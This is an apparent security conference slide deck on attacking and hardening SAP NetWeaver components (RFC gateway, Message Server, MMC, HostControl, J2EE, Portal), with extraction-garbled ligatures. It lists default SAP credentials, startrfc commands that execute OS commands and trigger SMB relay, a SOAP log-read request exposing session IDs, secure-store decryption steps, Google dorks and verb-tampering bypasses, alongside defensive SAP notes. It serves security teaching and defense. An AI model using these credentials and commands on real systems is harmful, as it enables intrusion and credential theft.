  
	
  
	
   67	
  
 ABAP	
  RFC	
  –	
  Anonymous	
  RFC’s	
  	
  
•  Check	
  If	
  func%on	
  can	
  be	
  accessed	
  anonymously	
  
•  There	
  are	
  some	
  func%ons	
  that	
  can	
  be	
  executed	
  anonymously	
  
–  RFC_PING	
  –	
  just	
  check	
  connec%on	
  
–  RFC_SYSTEM_INFO	
  	
  
–  RFC_GET_LOCAL_DESTINATIONS	
  
–  RFC_GET_LOCAL_SERVERS	
  
–  SYSTEM_INVISIBLE_GUI	
  
	
  
	
  
	
  	
  
	
  
68	
  
69	
  
DEMO	
  10:	
  
ABAP	
  RFC	
  –	
  informa)on	
  disclose	
  issues	
  
Default	
  creden=als	
  
They	
  can	
  be	
  used	
  to	
  run	
  RFC	
  func%ons	
  remotely	
  
	
  	
  
70	
  
USER	
   PASSWORD	
   Client	
  
SAP*	
   06071992,	
  PASS	
   000,001,066,Custom	
  
DDIC	
   19920706	
   000,001,Custom	
  
TMSADM	
   PASSWORD,	
  $1Pawd2&	
   000	
  
SAPCPIC	
   ADMIN	
   000,001	
  
EARLYWATCH	
   SUPPORT	
   066	
  
71	
  
DEMO	
  11:	
  
ABAP	
  RFC	
  –	
  user	
  crea)on	
  
ABAP	
  RFC	
  afacks	
  (SMBRELAY)	
  
•  EPS_DELETE_FILE	
  –	
  no	
  addi%onal	
  auth	
  checks	
  inside!	
  
•  EPS_CLOSE_FILE	
  
•  CLBA_CLASSIF_FILE_REMOTE_HOST	
  
•  CLBA_UPDATE_FILE_REMOTE_HOST	
  
•  EDI_DATA_INCOMMING	
  
•  RZL_READ_FILE	
  
•  50	
  more…..	
  
	
  
Example:	
  
>Startrfc.exe -3 –h 172.16.0.222 –s 01 –t -F
EDI_DATA_ICOMING –E PATHNAME=
172.16.0.101ERPScan -E PORT=SAPID3 –u
SAPCPIC –p admin
	
  
	
  	
  
	
  
72	
  
ABAP	
  RFC	
  afacks	
  (Command	
  execu=on)	
  
•  SXPG_CALL_SYSTEM	
  (any	
  command	
  using	
  vulnerability)	
  
Example:	
  
Startrfc.exe	
  -­‐3	
  -­‐h	
  172.16.0.222	
  -­‐s	
  	
  01	
  	
  
-­‐F	
  SXPG_COMMAND_EXECUTE	
  
-­‐E	
  COMMANDNAME=TYPE	
  
-­‐E	
  ADDITIONAL_PARAMETERS=	
  cat/etc/passwd	
  	
  
-­‐u	
  SAPCPIC	
  
-­‐p	
  admin	
  
73	
  
74	
  
DEMO	
  12:	
  
ABAP	
  RFC	
  –	
  remote	
  command	
  execu)on	
  
Gateway	
  Defense	
  
•  Secure	
  GW/monitor	
  
•  Enable	
  Secinfo	
  and	
  Reginfo	
  ACL	
  (don’t	
  use	
  *)	
  
•  Patch	
  for	
  latest	
  RFC	
  security	
  bypasses	
  rfc/reg_no_conn	
  
•  Restrict	
  access	
  to	
  dangerous	
  RFC	
  func%ons	
  
•  Enable	
  GW/logging	
  
	
  
	
  
75	
  
76	
  
SAP	
  Message	
  Server	
  security	
  
SAP	
  NetWeaver	
  
	
  
77	
  
SAP	
  Message	
  Server	
  -­‐	
  overview	
  
•  The	
  SAP	
  Message	
  server	
  provides	
  two	
  services.	
  	
  
–  manages	
  SAP	
  communica%on	
  between	
  the	
  applica%on	
  servers	
  of	
  one	
  
SAP	
  system.	
  	
  
–  provides	
  load-­‐balancing	
  informa%on	
  to	
  clients	
  like	
  the	
  SAP	
  GUI.	
  	
  
•  Before	
  7.0	
  listens	
  one	
  port	
  for	
  both	
  services	
  	
  
•  Since	
  7.0	
  default	
  installa%ons	
  automa%cally	
  split	
  into	
  
–  	
  internal	
  port	
  (used	
  for	
  applica%on	
  server	
  connec%ons)	
  
–  	
  external	
  port	
  (used	
  for	
  user	
  connec%ons).	
  
•  	
  This	
  is	
  defined	
  via	
  profile	
  parameters	
  	
  
–  rdisp/mshost,	
  -­‐	
  host	
  
–  rdisp/msserv,	
  -­‐	
  port	
  
–  rdisp/msserv_internal	
  must	
  be	
  !=0	
  
	
  
	
  
78	
  
SAP	
  Message	
  Server	
  -­‐	
  afacks	
  
Why	
  should	
  we	
  make	
  2	
  ports	
  for	
  SAP	
  MS?	
  
•  A}acker	
  can	
  register	
  fake	
  applica%on	
  server	
  on	
  message	
  server	
  
•  By	
  default	
  it	
  is	
  possible	
  without	
  authen%ca%on	
  
•  He	
  can	
  make	
  MITM	
  and	
  sniff	
  client	
  connec%ons	
  
	
  
	
  
79	
  
SAP	
  Message	
  Server	
  -­‐	
  ACL	
  
•  Even	
  if	
  you	
  restrict	
  access	
  to	
  message	
  server	
  from	
  GUI	
  clients	
  	
  
•  Applica%on	
  servers	
  can	
  access	
  it	
  
•  Ms/acl_info	
  can	
  be	
  used	
  to	
  list	
  approver	
  	
  app	
  servers	
  
•  The	
  entries	
  must	
  have	
  the	
  following	
  syntax:	
  
HOST=[*| ip_adr | host_name | Subnet_mask | Domain ] [, ...]
Examples for valid entries are:
HOST = * (all hosts are allowed)
HOST=host1,host2 (Logons allowed from host1 and host2)
HOST=*.sap.com (all hosts in the sap.com domain can log on)
HOST=147.45.56.32 (hosts with this IP address can log on)
HOST=147.45.56.* (hosts with this subnet can log on)
	
  
	
  
80	
  
Message	
  Server	
  monitoring	
  
•  SAP	
  Message	
  server	
  Monitoring	
  	
  
•  Can	
  remotely	
  get	
  informa%on	
  about	
  message	
  server	
  	
  
–  check	
  and	
  change	
  all	
  the	
  important	
  se›ngs	
  
–  create	
  and	
  view	
  traces	
  
–  read	
  sta%s%cs	
  
•  Managed	
  by	
  ms/monitor	
  op%on	
  
•  	
  if	
  ms/monitor	
  =1	
  and	
  ms/admin_port	
  !=0	
  anybody	
  can	
  get	
  
remote	
  access	
  by	
  using	
  “msmon”	
  tool	
  
	
  
h}p://help.sap.com/saphelp_nw04/helpdata/EN/64/3e7œ4a12e49b9856bb97970c6acc1/frameset.htm	
  
81	
  
82	
  
DEMO	
  15:	
  
Playing	
  with	
  MSMON	
  	
  
Message	
  server	
  -­‐	
  defense	
  
•  Disable	
  ms/monitor	
  
•  Enable	
  ms/acl_info	
  and	
  manage	
  ACL	
  
•  Enable	
  ms/admin_port	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
h}p://help.sap.com/saphelp_nw04/helpdata/en/40/c235c15ab7468bb31599cc759179ef/frameset.htm	
  
83	
  
84	
  
SAP	
  Message	
  Server	
  HTTP	
  
Message	
  server	
  HTTP	
  -­‐	
  info	
  
•  Message	
  Server	
  HTTP	
  
•  Just	
  simple	
  HTTP	
  service	
  with	
  informa%on	
  
•  There	
  is	
  no	
  need	
  to	
  have	
  this	
  service	
  	
  
•  Informa%on	
  disclose	
  vulnerability	
  exist:	
  
–  Read	
  details	
  about	
  connected	
  instances	
  
–  Read	
  	
  SAP	
  parameters	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
85	
  
86	
  
DEMO	
  16:	
  
Message	
  Server	
  HTTP	
  –	
  parameter	
  disclosure	
  
87	
  
SAP	
  NetWeaver	
  ICM	
  Security	
  
SAP	
  NetWeaver	
  
	
  
88	
  
Agenda	
  
	
  
•  History	
  of	
  SAP	
  web	
  applica%ons	
  and	
  	
  ITS	
  
•  ITS	
  vulnerabili%es	
  
•  ICM	
  architecture	
  
•  ICM	
  vulnerabili%es	
  
•  ICM	
  Defense	
  
	
  
	
  
89	
  
ICM	
  (Cri=cal	
  services)	
  
More	
  than	
  1500	
  services	
  which	
  can	
  execute	
  cri%cal	
  func%onality	
  
•  Every	
  registered	
  user	
  can	
  get	
  access	
  to	
  them	
  by	
  default	
  
–  Most	
  services	
  require	
  authen%ca%on	
  
–  You	
  can	
  use	
  any	
  of	
  defaults	
  to	
  a}ack	
  
–  By	
  default	
  all	
  ICF	
  services	
  are	
  not	
  assigned	
  to	
  any	
  Authoriza%on	
  value	
  
–  ANY	
  user	
  can	
  execute	
  any	
  ICF	
  service	
  
	
  (If	
  there	
  is	
  no	
  addi%onal	
  auth	
  checks	
  in	
  code	
  )	
  
–  There	
  are	
  many	
  cri%cal	
  services	
  which	
  can	
  be	
  used	
  by	
  unprivileged	
  user	
  
to	
  escalate	
  privileges	
  
•  Also	
  there	
  are	
  about	
  40	
  anonymous	
  services	
  (Transac%on	
  SICF)	
  
	
  
	
   90	
  
ICM	
  (List	
  of	
  cri=cal	
  services)	
  
Some	
  examples	
  of	
  RFC	
  func%ons:	
  
•  /sap/public/info	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  anonymous	
  info	
  about	
  system	
  
•  /sap/public/icf_info/icr_groups	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  installed	
  applica%ons	
  
•  /sap/bc/soap/rfc	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  remote	
  RRF	
  calls	
  
•  /sap/bc/srt/xip/sap	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  cri%cal	
  XI	
  func%ons	
  
•  /sap/bw/Bex 	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  reading	
  infoobjects	
  remotely	
  
•  /sap/bc/bsp/sap/htmlb_samples	
  	
  	
  	
  	
  test	
  service	
  with	
  vulnerabili%es	
  
•  /sap/bc/gui/sap/its/webgui	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  webgui	
  access	
  
	
  
	
  
	
  
91	
  
ICM	
  (Cri=cal	
  services)	
  
•  Service	
  /sap/public/info	
  	
  	
  -­‐	
  anonymous	
  info	
  about	
  system	
  
•  Can	
  be	
  called	
  anonymously	
  without	
  having	
  user	
  rights	
  
	
  
	
  
	
  
	
  
	
  
92	
  
ICM	
  (Cri=cal	
  services)	
  
•  Service	
  /sap/public/icf_info/icr_urlprefix	
  	
  	
  installed	
  
applica%ons	
  
	
  
	
  
	
  
	
  
93	
  
94	
  
DEMO	
  17:	
  
ITS	
  Infdisclose	
  by	
  ERPScan	
  Pentes)ng	
  Tool	
  
Default	
  creden=als	
  
They	
  can	
  be	
  used	
  to	
  run	
  RFC	
  func%ons	
  remotely	
  
	
  	
  
95	
  
USER	
   PASSWORD	
   Client	
  
SAP*	
   06071992,	
  PASS	
   000,001,066,Custom	
  
DDIC	
   19920706	
   000,001,Custom	
  
TMSADM	
   PASSWORD,	
  $1Pawd2&	
   000	
  
SAPCPIC	
   ADMIN	
   000,001	
  
EARLYWATCH	
   SUPPORT	
   066	
  
ICM	
  (Cri=cal	
  services)	
  
•  Cri%cal	
  service	
  sap/bc/soap/rfc	
  	
  
•  RFC	
  func%ons	
  are	
  mapped	
  to	
  RFC	
  authoriza%on	
  groups	
  
•  Security	
  of	
  standard	
  SOAP	
  RFC	
  calls	
  
–  User	
  must	
  have	
  S_RFC	
  authoriza%on	
  to	
  group	
  of	
  RFC	
  func%ons	
  to	
  
execute	
  any	
  call	
  in	
  this	
  group	
  
–  User	
  must	
  have	
  authoriza%ons	
  which	
  are	
  defined	
  inside	
  RFC	
  func%on	
  to	
  
execute	
  this	
  func%on	
  
–  Many	
  RFC	
  func%ons	
  don’t	
  have	
  any	
  special	
  authoriza%on	
  checks	
  so	
  every	
  
user	
  can	
  call	
  them	
  by	
  SOAP	
  RFC	
  
	
  	
  
	
  
	
   96	
  
97	
  
DEMO	
  18:	
  
SOAP	
  RFC’s	
  by	
  ERPScan	
  Pentes)ng	
  Tool	
  
ICM	
  Service	
  Defense:	
  other	
  
•  Disable	
  or	
  configure	
  customized	
  HTTP	
  server	
  header	
  for	
  ICM	
  
(sap	
  note	
  1329326)	
  
•  Disable	
  or	
  configure	
  disclosure	
  of	
  hidden	
  version	
  
	
  (sap	
  note	
  747818)	
  
•  Disable	
  services	
  that	
  are	
  not	
  necessary	
  (note	
  1498575)	
  	
  
•  Configure	
  ICF	
  authoriza%on	
  	
  for	
  enabled	
  services	
  
•  Change	
  default	
  passwords	
  
	
  
	
  
	
   98	
  
99	
  
SAP	
  Management	
  Console	
  security	
  
SAP	
  NetWeaver	
  
	
  
100	
  
MMC	
  
Service	
  
SAPHostcontrol	
  
SAP	
  MMC	
  -­‐	
  overview	
  
•  MMC	
  is	
  installed	
  by	
  default	
  on	
  port	
  5<ID>13	
  
•  Used	
  for	
  remote	
  management	
  of	
  SAP	
  servers	
  
•  Command	
  executed	
  via	
  SOAP	
  interface	
  
•  By	
  default	
  SSL	
  is	
  not	
  implemented	
  
•  Administra%on	
  password	
  transmi}ed	
  using	
  basic	
  auth	
  (base64)	
  
•  By	
  sniffing	
  this	
  password	
  we	
  can	
  get	
  full	
  control	
  over	
  the	
  server	
  
	
  
	
  
101	
  
SAP	
  MMC	
  	
  afacks	
  
•  Many	
  a}acks	
  can	
  be	
  implemented	
  without	
  authen%ca%on	
  
•  A}acks	
  can	
  be	
  realized	
  by	
  sending	
  SOAP	
  requests	
  
•  Mostly	
  it	
  is	
  informa%on	
  disclose	
  and	
  denial	
  of	
  service	
  
•  Also	
  OS	
  command	
  execu%on	
  	
  	
  
•  All	
  MMC	
  a}acks	
  are	
  implemented	
  in	
  ERPScan	
  Pentes%ng	
  Tool	
  
	
  
	
  
102	
  
SAP	
  MMC	
  afacks	
  	
  
ERPScan	
  Pentes%ng	
  Tool	
  modules	
  
•  GET_VERSION_gSOAP.pl	
  
–  Obtaining	
  version	
  of	
  SAP	
  NetWeaver	
  
•  GET_ENV_gSOAP.pl	
  
–  Obtaining	
  list	
  of	
  SAP	
  parameters	
  
•  LIST_LOGS_gSOAP.pl	
  
–  Show	
  the	
  list	
  of	
  log	
  files	
  that	
  can	
  be	
  obtained	
  
•  LIST_TRACE_gSOAP.pl	
  
–  Show	
  the	
  list	
  of	
  Trace	
  files	
  that	
  can	
  be	
  obtained	
  remotely	
  
103	
  
SAP	
  MMC	
  afacks	
  	
  
•  GET_LOGS_gSOAP.pl	
  
–  Sow	
  log	
  file	
  details	
  
•  GET_TRACE_gSOAP.pl	
  
–  Show	
  trace	
  file	
  details	
  
	
  
104	
  
Advanced	
  MMC	
  Afacks	
  
•  SAP	
  MMC	
  provides	
  a	
  common	
  framework	
  for	
  centralized	
  
system	
  management	
  
•  Allowing	
  to	
  see	
  the	
  trace	
  and	
  log	
  messages	
  
•  File	
  userinterface.log	
  can	
  store	
  JSESSIONID	
  is	
  trace	
  is	
  ON	
  
•  Using	
  JSESSIONID	
  from	
  logs,	
  a}acker	
  can	
  log	
  into	
  SAP	
  Portal	
  	
  
105	
  
Advanced	
  MMC	
  Afacks	
  
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/
envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header>
<sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/
features/session/">
<enableSession>true</enableSession>
</sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
<filename>j2ee/cluster/server0/log/system/userinterface.log</
filename>
<filter/>
<language/>
<maxentries>%COUNT%</maxentries>
<statecookie>EOF</statecookie>
</ns1:ReadLogFile>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
106	
  
107	
  
DEMO	
  19:	
  
SAP	
  MMC	
  a<acks	
  by	
  ERPScan	
  Pentes)ng	
  Tool	
  
SAP	
  MMC-­‐	
  defense	
  
•  Install	
  Sapnote	
  927637	
  
•  Install	
  Sapnote	
  1439348	
  –	
  informa%on	
  disclosure	
  in	
  MMC	
  
•  Install	
  Sapnote	
  1469804	
  -­‐	
  Poten%al	
  DOS	
  in	
  sapstartsrv	
  
•  Don’t	
  use	
  TRACE_LEVEL	
  =	
  3	
  in	
  produc%on	
  systems	
  
•  Delete	
  traces	
  
•  Disable	
  methods	
  service/protectedwebmethods	
  =	
  SDEFAULT	
  
•  Disable	
  access	
  from	
  untusted	
  IP’s	
  
–  service/hfp/acl_file	
  	
  
–  service/hfps/acl_file	
  
	
  
h}p://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm	
  	
  
	
  
	
   108	
  
109	
  
SAP	
  HostControl	
  security	
  
SAP	
  NetWeaver	
  
	
  
110	
  
MMC	
  
Service	
  
SAPHostcontrol	
  
SAPHostControl	
  
•  Service	
  listens	
  on	
  port	
  1128/tcp.	
  
•  Very	
  similar	
  to	
  MMC	
  
•  Many	
  a}acks	
  can	
  be	
  implemented	
  without	
  authen%ca%on	
  
•  A}acks	
  can	
  be	
  realized	
  by	
  sending	
  SOAP	
  requests	
  
•  Vulnerability	
  	
  in	
  the	
  GetDataBaseStatus	
  functon	
  
•  Parameters	
  are	
  passed	
  to	
  dbmcli	
  executable	
  
•  SAP	
  MaxDB	
  	
  only	
  
	
  
	
  
	
   111	
  
112	
  
DEMO	
  21:	
  
SAP	
  HostControl	
  command	
  injec)on	
  by	
  
ERPScan	
  Pentes)ng	
  Tool	
  
Defense	
  
•  Install	
  Sapnote	
  1341333	
  	
  -­‐	
  command	
  injec%on	
  
•  Disable	
  access	
  from	
  untusted	
  IP’s	
  
	
  
	
  
	
  
	
  
	
  
	
  
113	
  
114	
  
SAP	
  NetWeaver	
  J2EE	
  security	
  
SAP	
  NetWeaver	
  
	
  
115	
  
J2EE	
  Engine	
  
•  Automa%on	
   of	
   business	
   processes	
   like	
   ERP,	
   PLM,	
   CRM,	
   SRM	
  
based	
  ABAP.	
  
•  Integra%on,	
   collabora%on	
   and	
   management	
   based	
   on	
   J2ee	
  
engine:	
  
–  SAP	
  Portal	
  	
  
–  SAP	
  PI	
  
–  SAP	
  XI	
  
–  SAP	
  Mobile	
  Infrastructure	
  
–  SAP	
  Solu=on	
  Manager	
  
	
  
	
  
	
   116	
  
Many	
  SAP	
  systems	
  don’t	
  use	
  ABAP	
  stack	
  
J2EE	
  Plamorm	
  Architecture	
  	
  
	
  
	
  
	
  
	
  
	
  
	
  
117	
  
SAP	
  J2EE	
  Services	
  
•  General	
  services	
  
–  SAP	
  Visual	
  Admin	
  (P4)	
  
–  SAP	
  NetWeaver	
  HTTP	
  (webserver)	
  
•  Addi%onal	
  services	
  
–  SAP	
  Portal	
  
–  SAP	
  SDM	
  
–  SAP	
  SDM	
  Admin	
  
–  SAP	
  LogViewer	
  
–  SAP	
  J2EE	
  Telnet	
  
	
  
	
  
	
  
118	
  
SAP	
  Security	
  storage	
  
119	
  
•  The	
  SAP	
  J2EE	
  Engine	
  stores	
  the	
  database	
  user	
  SAP<SID>DB	
  	
  and	
  
all	
  configura%ons	
  in	
  	
  specific	
  file	
  
•  The	
  J2EE	
  Engine	
  uses	
  the	
  SAP	
  Java	
  Cryptography	
  Toolkit	
  to	
  
encrypt	
  the	
  contents	
  of	
  the	
  secure	
  store	
  with	
  the	
  
tripleDES	
  algorithm.	
  
•  usrsap<SID>SYSglobalsecuritydataSecStore.proper)es	
  	
  
config.proper=es	
  
120	
  
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/
instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
secstore.proper=es	
  
121	
  
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u
+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv
+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/
+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u
+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u
+14j6s14sTxXU3ONl3rL6N7yssV75eC
profit	
  
122	
  
•  We	
  have	
  an	
  encrypted	
  password	
  
•  We	
  have	
  a	
  key	
  to	
  decrypt	
  it	
  
•  We	
  got	
  the	
  J2EE_ADMIN	
  and	
  JDBC	
  password!	
  
Preven=on	
  
123	
  
• 	
  Install	
  SAP	
  note	
  1619539	
  
• 	
  Restrict	
  read	
  access	
  to	
  files	
  SecStore.proper)es	
  and	
  
SecStore.key	
  
124	
  
SAP	
  Visual	
  Admin	
  security	
  
SAP	
  VisualAdmin	
  
125	
  
•  SAP	
  Visual	
  Admin	
  –	
  remote	
  tool	
  for	
  controlling	
  J2EE	
  Engine	
  
•  Use	
  p4	
  protocol	
  –	
  SAP’s	
  proprietary	
  
•  By	
  default	
  all	
  data	
  transmi}ed	
  in	
  cleartext	
  
•  P4	
  can	
  be	
  configured	
  to	
  use	
  SSL	
  to	
  prevent	
  MITM	
  
•  Passwords	
  transmi}ed	
  by	
  some	
  sort	
  of	
  encryp%on	
  	
  
•  In	
  reality	
  it	
  is	
  some	
  sort	
  of	
  Base64	
  transform	
  with	
  known	
  key	
  
	
  
	
  
	
  	
  
SAP	
  VisualAdmin	
  data	
  
126	
  
Insecure	
  password	
  encryp=on	
  in	
  P4	
  
127	
  
/* 87 */ char mask = 43690;
/* 88 */ char check = 21845;
/* 89 */ char[] result = new
char[data.length + 1];
/* */
/* 91 */ for (int i = 0; i < data.length; +
+i) {
/* 92 */ mask = (char)(mask ^ data[i]);
/* 93 */ result[i] = mask;
/* */ }
/* 95 */ result[data.length] = (char)(mask
^ check);
/* */
/* 97 */ return result;
Defense	
  
128	
  
•  Use	
  SSL	
  for	
  securing	
  all	
  data	
  transmi›ng	
  between	
  server-­‐server	
  
and	
  server-­‐client	
  connec%ons	
  
h}p://help.sap.com/saphelp_nwpi71/helpdata/de/14/
ef2940cbf2195de10000000a1550b0/content.htm	
  
129	
  
SAP	
  NetWeaver	
  HTTP	
  security	
  
SAP	
  Google	
  dorks	
  
130	
  
SAP	
  HTTP	
  Services	
  can	
  be	
  easily	
  found	
  in	
  internet:	
  
•  inurl:/irj/portal
•  inurl:/IciEventService sap
•  inurl:/IciEventService/IciEventConf
•  inurl:/wsnavigator/jsps/test.jsp
•  inurl:/irj/go/km/docs/
Informa=on	
  disclose	
  
131	
  
•  Kernel	
  or	
  applica%on	
  release	
  and	
  SP	
  version.	
  	
  
	
   	
  ERPSCAN-­‐11-­‐023,ERPSCAN-­‐11-­‐027,	
  DSECRG-­‐00208	
  
	
  
•  Applica%on	
  logs	
  and	
  traces	
  	
  
	
   	
  DSECRG-­‐00191,DSECRG-­‐00232	
  
	
  
•  Username	
  	
  
	
   	
  ERPSCAN-­‐00231	
  
	
  
•  Internal	
  port	
  scanning,	
  Internal	
  User	
  bruteforce	
  	
  
	
   	
  ERPSCAN-­‐11-­‐032,DSECRG-­‐00175	
  
	
  
Informa=on	
  disclose	
  
132	
  
Informa=on	
  disclose	
  
133	
  
User	
  disclose	
  ERPSCAN-­‐00231	
  
134	
  
	
  	
  	
  	
  	
  	
  
	
  
Internal	
  Port	
  scan	
  ERPSCAN-­‐11-­‐032	
  
Host	
  is	
  not	
  alive	
  
135	
  
Port	
  closed	
  
HTTP	
  port	
  
SAP	
  port	
  
Preven=on	
  
136	
  
	
  
• 	
  	
  	
  Install	
  SAP	
  notes	
  1548548,1545883,1503856,948851,	
  1545883	
  
• 	
  	
  	
  Update	
  the	
  latest	
  SAP	
  notes	
  every	
  month	
  
• 	
  	
  	
  Disable	
  unnecessary	
  applica%ons	
  
	
  
Authen=ca=on	
  
137	
  
•  Declara=ve	
  authen=ca=on:	
  	
  
•  The	
  Web	
  container	
  (J2EE	
  Engine)	
  handles	
  authen%ca%on	
  
•  Example:	
  	
  J2EE	
  Web	
  applica%ons	
  	
  
•  Programma=c	
  authen=ca=on.	
  	
  
•  Components	
  running	
  on	
  the	
  J2EE	
  Engine	
  authen%cate	
  
directly	
  against	
  the	
  User	
  Management	
  Engine	
  (UME)	
  using	
  
the	
  UME	
  API.	
  	
  
•  Example:	
  Web	
  Dynpro,	
  Portal	
  iViews	
  	
  
	
  
	
  
Declara=ve	
  authen=ca=on	
  
138	
  
WEB.XML	
  file	
  is	
  stored	
  in	
  WEB-­‐INF	
  directory	
  of	
  applica%on	
  root.	
  
	
  
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-
resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>DELETE</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>
Invoker	
  servlet	
  
139	
  
•  Func%onality	
  for	
  rapid	
  calling	
  servlets	
  by	
  their	
  class	
  name	
  	
  
•  Possible	
  to	
  call	
  any	
  servlet	
  from	
  applica%on	
  even	
  if	
  it	
  is	
  not	
  
declared	
  in	
  	
  WEB.XML	
  	
  
•  Call	
  it	
  directly	
  by	
  using	
  /servlet/	
  directory	
  and	
  name	
  of	
  the	
  class	
  
•  Like	
  this	
  /servlet/com.sap.admin.Cri%cal.Ac%on	
  
Invoker	
  servlet	
  auth	
  bypass	
  
140	
  
<servlet>
<servlet-name>CriticalAction</servlet-name>
<servlet-class>com.sap.admin.Critical.Action</servlet-
class>
</servlet>
<servlet-mapping>
<servlet-name>CriticalAction</</servlet-name>
<url-pattern>/admin/critical</url-pattern>
</servlet-mapping
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>
Preven=on	
  
141	
  
	
  
• 	
  	
  	
  	
  	
  	
  Install	
  latest	
  updates	
  
• 	
  	
  	
  	
  	
  	
  Disable	
  feature	
  by	
  changing	
  the	
  value	
  of	
  the	
  “EnableInvokerServletGlobally”	
  
property	
  of	
  the	
  servlet_jsp	
  service	
  on	
  the	
  server	
  nodes	
  to	
  “false”.	
  	
  
• 	
  	
  	
  	
  	
  To	
  enable	
  invoker	
  servlet	
  for	
  some	
  applica%ons	
  check	
  SAP	
  note	
  1445998	
  
• 	
  	
  	
  	
  	
  For	
  SAP	
  NetWeaver	
  Portal,	
  see	
  SAP	
  Note	
  1467771	
  
	
  
142	
  
DEMO	
  24:	
  
SAP	
  NetWeaver	
  J2EE	
  invoker	
  servlet	
  
unauthorized	
  file	
  read	
  
143	
  
DEMO	
  25:	
  
SAP	
  NetWeaver	
  J2EE	
  invoker	
  servlet	
  file	
  read	
  
+	
  secstore	
  decrypt	
  
Verb	
  Tampering	
  
144	
  
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-
resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>
What	
  if	
  we	
  will	
  use	
  HEAD	
  instead	
  of	
  GET	
  ?	
  
Verb	
  Tampering	
  example:	
  Auth	
  bypass	
  
•  Administra%ve	
  	
  interface	
  for	
  managing	
  J2EE	
  engine	
  (CTC)	
  
•  Can	
  be	
  accessed	
  remotely	
  	
  
•  Can	
  run	
  user	
  management	
  ac%ons	
  	
  
-  Create	
  new	
  users	
  
-  Assign	
  them	
  to	
  any	
  Roles	
  
-  Execute	
  OS	
  command	
  on	
  the	
  server	
  side	
  
-  Create	
  RFC	
  Des%na%ons	
  
-  Read	
  RFC	
  Des%na%ons	
  info	
  
	
  
145	
  
It	
  means	
  that	
  a6acker	
  get	
  full	
  access	
  to	
  SAP	
  and	
  OS	
  
146	
  
DEMO	
  26:	
  
SAP	
  NetWeaver	
  J2EE	
  verb	
  tampering	
  user	
  
crea)on	
  
Preven=on	
  
147	
  
Preven%on:	
  
• 	
  	
  	
  Install	
  SAP	
  note	
  1503579,1616259	
  
• 	
  	
  	
  Scan	
  applica%ons	
  using	
  ERPScan	
  WEB.XML	
  check	
  tool	
  or	
  
manually	
  
• 	
  	
  	
  	
  Secure	
  WEB.XML	
  by	
  dele%ng	
  all	
  	
  <h}p-­‐method>	
  
• 	
  	
  	
  	
  Disable	
  applica%on	
  that	
  are	
  not	
  necessary	
  
148	
  
SAP	
  NetWeaver	
  Portal	
  Security	
  	
  
SAP	
  Portal	
  
•  Point	
  of	
  web	
  access	
  to	
  SAP	
  systems	
  
•  Point	
  of	
  web	
  access	
  to	
  other	
  corporate	
  systems	
  
•  Way	
  for	
  a}ackers	
  to	
  get	
  access	
  to	
  SAP	
  from	
  the	
  Internet	
  
•  ~1000	
  Portals	
  in	
  the	
  world,	
